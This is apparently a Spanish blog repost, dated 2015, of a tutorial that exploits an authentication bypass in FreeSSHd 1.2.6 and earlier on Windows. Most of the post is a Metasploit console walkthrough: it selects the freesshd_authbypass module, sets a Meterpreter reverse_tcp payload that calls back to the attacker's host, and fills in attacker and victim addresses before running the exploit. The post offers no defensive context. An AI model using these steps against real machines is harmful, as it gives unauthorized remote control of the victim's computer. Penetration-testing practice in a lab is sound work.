lunes, 26 de enero de 2015

Exploit Windows PC using Freesshd Authentication Bypass

This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Exploit Targets

Freesshd 1.2.6 / Windows

Requirement

Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/ssh/freesshd_authbypass
msf exploit (freesshd_authbypass)>set payload windows/meterpreter/reverse_tcp
msf exploit (freesshd_authbypass) set lhost 192.168.1.4 (IP of Local Host)
msf exploit (freesshd_authbypass)>set rhost 192.168.1.6 (IP of Victim PC)
msf exploit (freesshd_authbypass)>exploit 

Fuente:http://www.hackingarticles.in/exploit-windows-pc-using-freesshd-authentication-bypass/

No hay comentarios:

Publicar un comentario